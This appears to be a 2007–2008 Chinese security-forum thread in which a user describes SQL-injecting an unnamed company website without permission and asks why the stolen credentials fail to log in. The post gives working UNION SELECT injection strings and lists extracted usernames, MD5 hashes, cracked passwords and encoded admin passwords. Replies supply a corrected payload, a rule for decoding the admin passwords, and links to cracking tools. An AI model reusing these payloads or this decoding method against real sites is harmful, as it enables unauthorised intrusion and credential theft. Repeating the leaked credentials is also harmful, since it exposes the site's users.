邪恶八进制信息安全团队技术讨论组 » 技术讨论{ Technique Discussions } » [讨论]关于手动注入的问题 请高手来帮忙解决下 [查看完整版本]

哈破boy 2007-12-24 18:31

[讨论]关于手动注入的问题 请高手来帮忙解决下

信息来源：邪恶八进制信息安全团队（[url]www.eviloctal.com[/url]）
议题作者：哈破boy

这是关于SQL手动注入的一个问题
今天晚上, 我找了一个企业网站,通过命令and 1=1 和 and 1=2 发现了有注入漏洞
相继猜出字段数目是15,有两个表名 分别是 user 和 manage_User
可是,问题出在 在我猜用户和密码的时候 返回的用户:BlueM  MD5密码是:49ba59abbe56e057   经解密:123456
在后台登陆时,密码错误. 前台登陆一样密码错误!
  后来我用DOMIAN3.5来试了下 扫出user下有两个用户名 一个用户名是BlueM 对应MD5密码是:b51a468e87e07820 经解密:369258
                                    另一个用户名是:xiaoyang 对应MD5密码是:49ba59abbe56e057 经解密:123456
  manage_user下也有两个用户名: 一个用户名是:admin 密码是:2;;588<<  另一个用户是f77465g 密码是:586:,>erd

我用user下的两个用户登陆后台 提示帐户不存在或者密码错误, 在前台登陆帐户密码对了...我发现手动猜USER的时候密码用户怎么显示BlueM 而加密的密码是xiaoyang这个帐户的加密密码???
这是问题1
命令是: and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from user  (回车)
      and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%user  (页面显示正常,页面显示 3>>4>>6)
      and%201=2%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15%20from%user (页面显示:3>>49ba59abbe56e057>>6)
      and%201=2%20union%20select%201,2,3,username,5,6,7,8,9,10,11,12,13,14,15%20from%user (页面显示:3>>BlueM>>6)
为什么会出现这种情况??? 麻烦高手解答下
当用manage_user下的两个用户登陆后台时: 提示帐户不存在或者密码错误, 在前台登陆时也一样提示帐户不存在或者密码错误!为什么会这样?这是问题2

小弟先在这真心的感谢下回帖的人.

沉渊 2007-12-28 17:02

and%201=2%20union%20select%201,2,username,password,5,6,7,8,9,10,11,12,13,14,15%20from%user

至于2个密码，第一个19813254，第二个有点不大对头，貌似是 4636&#39;8^j[  ？

fucking 2007-12-28 19:59

我觉得应该效验下数据库的真实性，我以前也经常遇到比如猜出了用户名密码，但是就是无法登陆(其实这种情况有很多说法，比如后台做了安全策略，限制了登陆IP点。。)，其实好多管理员喜欢这样娱乐我们这些脚本小子啦。。。哈哈。。。

knlve 2007-12-29 10:49

后台可能是假的!

akens 2007-12-31 01:20

2;;588<<和586:,>erd 这两个密码也是被加密了的
有解这种密码的小工具

hackest 2008-1-1 12:44

D:\pass\decode>decode.exe
******************************************
欢迎使用此解密工具^_^

哈破boy 2008-1-10 19:33

老大 你这个 破密码的 软件能不能提供下啊

anki 2008-1-11 10:11

密码再解密下就好随风破解软件也可以破解。。呵呵

icefox.eer 2008-1-12 00:03

密文的ascii码减去密文所在位置,可以自己写解码的程序。

哈破boy 2008-1-12 00:16

[quote]引用第5楼hackest于2008-01-01 12:44发表的 :
D:passdecode>decode.exe
******************************************
欢迎使用此解密工具^_^          *
by:hackest[E.S.T]            *
欢迎访问：[url]http://forum.eviloctal.com/[/url]  *
.......[/quote]

还是找不到解这种密文的工具.....   又谁能帮下忙????

silenceshell 2008-1-12 00:33

嗯...楼上的找到了给我分享一下，
我也经常遇到这个问题

[email]hidehai@yeah.net[/email]

awolf 2008-1-12 09:47

加密算法貌似和雷池新闻系统的一样！
如果一样的话，你可以用这个试试！
[url]http://bbs.awolf07.cn/viewthread.php?tid=107&extra=page%3D1[/url]
貌似一样的解法！
竟然这个真和雷池加密一样算法，看我解密结果：
[img]http://pic.yupoo.com/awolf07/932664eb941d/4llaj1kc.jpg[/img]
[img]http://pic.yupoo.com/awolf07/089184eb941c/9wtg97jf.jpg[/img]

杀虫剂 2008-1-12 21:14

hackest 用你在网上公布的代码编译了下，，密码解不出哦。
[s:268]

awolf 2008-1-15 00:03

楼上的朋友试试我的工具。。。貌似和hackest的一样的原理，上次解密出来的结果一样的，只是我是vb的

dongxuewuhen 2008-1-18 21:06

楼主说的这种管理系统我见过一些manage_user里的密码扫出来有时是加密了的,工具以前X档案上好像公布过.

查看完整版本: [讨论]关于手动注入的问题 请高手来帮忙解决下

© 1999-2008 EvilOctal Security Team